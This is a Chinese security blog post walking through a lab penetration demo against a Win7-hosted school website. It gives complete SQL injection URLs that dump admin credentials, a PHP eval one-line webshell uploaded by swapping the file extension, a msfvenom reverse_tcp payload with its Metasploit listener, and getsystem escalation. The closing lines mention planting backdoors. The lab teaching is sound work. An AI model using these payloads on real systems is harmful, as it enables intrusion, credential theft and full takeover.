freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

模拟网站攻击到提权的全部过程
dotast 2021-09-28 19:41:39 241404

注:本文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本文章不承担任何法律及连带责任,请遵守中华人民共和国安全法。

前言

今天去给新一届的学生演示一次网站拿webshell到系统提权的过程,但不幸的是中间翻车了,老年人紧张得忘记了msf监听木马的指令,然后哆哆嗦嗦的在大家眼下,打开了笔记查看一下2333…所以更新一下文章,给自己一个教训QWQ。

准备工作

靶机(被攻击方):win7系统
入侵者(攻击方):win10系统、kali系统

首先启动win7系统,搭建一个常见的校园网站,然后映射到局域网,使得我们能正常访问。

1632795659_61527c0bc934ab4e76a0f.png!small?1632795655262

从网站拿到webshell

sql注入漏洞

把整个网站浏览完一遍后,我们发现这里的url为?id=10结尾,我们猜测可能是一个sql注入点。

1632795674_61527c1a3bbe6fd020fdf.png!small?1632795665877

首先我们在id=10后面加上一个单引号’进行判断。1632795696_61527c300683bc270f074.png!small?1632795687824

这个时候我们发现回显的数据不正常,于是我们再加一个注释符号。

1632795707_61527c3bc2ff11b27e95a.png!small?1632795699401

发现数据这个时候回显的时候是正常的,到这一步我们已经可以确定这里存在一个sql注入漏洞。

原理我们可以简单解释一下
在网站中,我们一般使用数据库存储网站数据,网站和数据库是存在一个交互性。网站所呈现的内容是由代码中写入的sql语句调用数据库中的内容进行一个呈现,例如我们刚刚看到的文字。
而sql注入漏洞一般是由于程序员书写的sql语句不规范所导致的安全事件。

例如网站源码中使用如下的sql语句进行查询。

1632795726_61527c4e43c60c6948cc4.png!small?1632795717745

给语句结尾的where查询条件加上一个单引号’。

1632795746_61527c627499750f0a8c6.png!small?1632795737926

很显然,我们传入的单引号和前面的单引号闭合,后面只有一个无法成对的单引号,然后报了语法错误。这个时候我们再加上--+注释符号注释掉后面的单引号。

1632795770_61527c7a5589e5afdcc6c.png!small?1632795761867

这个时候查询的数据就会正确回显出来。

原理简单解释了一下之后,我们回到刚刚的网站。
这个时候我们发现存在sql注入漏洞之后,我们就开始进行查询对方网站数据库的数据,找到一些敏感信息,例如管理员的账号密码等等。

首先,我们使用order by语句快速猜解出表中的列数。

1632795783_61527c87744f2f5b6b6cc.png!small?1632795777010

发现10列的时候报错,说明不足10列,我们继续缩小范围。

1632795793_61527c911c5950ed9440f.png!small?1632795784695

再查询第8列的时候,发现数据回显正确,说明对方表中含有列数8
我们使用union select 自定义查询测试一下,zhu意我们这里前面的id=10,要写成id=-10,把这里的查询置空。1632795804_61527c9c87c29c140710b.png!small?1632795799161

发现会分别回显第三列、第五列和第七列。接下来我们就可以在三、五、七处做做文章。

查询数据库名字:

http://192.168.1.167/yxlink/tuku/images.php?id=-10' union select 1,2,database(),4,5,6,7,8--+

1632795844_61527cc479310f8defea3.png!small?1632795836173

得到数据库名字:qzn_zuiai

查询数据库中的表名:

http://192.168.1.167/yxlink/tuku/images.php?id=-10' union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema="qzn_zuiai"--+

1632795919_61527d0f42718d8b8862b.png!small?1632795910952

得到一共se2admin,se2fl,se2hd,se2nr,se2tufl,se2tunr,se2wz,se2zf,sj3sk九张表
通过表名,我们猜测se2admin可能是存储管理员账号和密码的表,所以我们先查询这张表中的数据

查询表se2admin中的字段:

http://192.168.1.167/yxlink/tuku/images.php?id=-10' union select 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name="se2admin"--+

1632795941_61527d25f04fb3ea7ed7f.png!small?1632795933826

得到表中的字段值有id,name,pass等,接下来我们查询name和pass的字段值。

查询字段值:

http://192.168.1.167/yxlink/tuku/images.php?id=-10' union select 1,2,name,4,pass,6,7,8 from se2admin--+

1632795961_61527d3996e0775446176.png!small?1632795953325

我们得到管理员账号:admin,管理员账号密码:7fef6171469e80d32c0559f88b377245
很显然密码值是被加密的md5值,所以我们去网上找md5网站进行撞库查询。

1632795977_61527d49201a260f05bf9.png!small?1632795968691

得到管理员密码为:admin888
接下来我们需要查找这个网站的后台地址,我们使用御剑进行一个扫描。

1632795987_61527d53b17d99bdc271c.png!small?1632795979344

御剑爆出了很多敏感地址,我们找到一个admin的目录,可能是后台地址,我们去访问一下。

1632796005_61527d65f2b5993fc9ab8.png!small?1632796000606

输入我们刚刚得到的管理员账号和密码admin:admin888。

1632796017_61527d710030f911ad480.png!small?1632796008586

这个时候,我们成功进入对方网站后台。

文件上传漏洞

接下来我们再这里找到一个文件上传点。

1632796032_61527d80f28f1d7984dbe.png!small?1632796024632

我们写一个简单的一句话木马。

<?php @eval($_POST['pass']);?>

1632796056_61527d980d79dd56d09bf.png!small?1632796047478

考虑到这里可能会对我们上传的文件进行一个后缀限制,例如只能上传jpg或者png图片格式文件等,所以我们把muma.txt改成muma.jpg格式。

1632796070_61527da69932293b3e3e5.png!small?1632796062656

我们开启burpsuite,然后点提交,拦截到我们发送的数据包。

1632796079_61527daf760aaf90efa47.png!small?1632796071040

我们把muma.jpg改回php文件类型:muma.php。

1632796092_61527dbc5e6d07c7195f6.png!small?1632796084012

然后发送数据包。

1632796109_61527dcda9e85606aa0e9.png!small?1632796101392

ok,已经上传成功,我们去找找我们上传后的路径。

1632796120_61527dd8101b5e576f55d.png!small?1632796111628

得到我们的上传完整路径为:http://192.168.1.167/yxlink/img/img_3699336993.php
我们使用蚁剑进行连接我们上传的木马。

1632796140_61527decdbf9c3deddccd.png!small?1632796132497

成功连接,进入到对方服务器。

1632796156_61527dfc733567356eff6.png!small?1632796148005

到此,已成功拿到webshell。

反弹shell连接

接下来我们利用kali的msf制作一个exe类型的反弹型木马。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip LPORT=端口 -f 类型 -o 文件名

1632796182_61527e16b2e307d0d738d.png!small?1632796174613

把做好的木马,通过我们蚁剑刚刚连接的webshell进行上传。

1632796194_61527e22dcb3fbe5e7efb.png!small?1632796186436

1632796202_61527e2a822bffecd2022.png!small?1632796194083

上传成功后,我们在kali启动msf。

1632796213_61527e35b7ada269f64a6.png!small?1632796205606

执行监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.131
set lport 4444
exploit

1632796266_61527e6a6c7dbef12e270.png!small?1632796258368

执行木马

msf开启监听之后,我们去蚁剑webshell执行我们上传的木马。

1632796287_61527e7f412ee99c2a352.png!small?1632796278713

执行之后,回到kali,我们可以看到msf目标正在回连,创建Meterpreter会话成功。

1632796297_61527e89ad2359f138252.png!small?1632796289857

提权

首先查看一下我们的用户权限。

1632796311_61527e977b78821d1f479.png!small?1632796302870

发现是普通用户权限,之前我们已经在webshell观察到对方是win7系统,所以我们采用的是windows的载荷攻击
我们尝试使用getsystem进行提权试试。

1632796324_61527ea414f5e7c612456.png!small?1632796315611

发现直接提权成功,现在我们拥有windows最高权限system。
接下来我们打印一下系统信息,并且拍照对方电脑现在状态。

1632796338_61527eb2b457b8deaecac.png!small?1632796330360

1632796346_61527ebaa76fbf99a3046.png!small?1632796339972

ok,成功。

结语

在拿到system权限之后,我们可以干很多很多的事…例如给对方种下后门,拿来当肉鸡等等… …
这告诉我们开发网站必须注重安全,否则带来的后果是无穷大的。
emmm…这波有点难受。

# 渗透测试 # 黑客 # web安全
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 dotast 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
dotast LV.1
这家伙太懒了,还未填写个人描述!
  • 1 文章数
  • 5 关注者
文章目录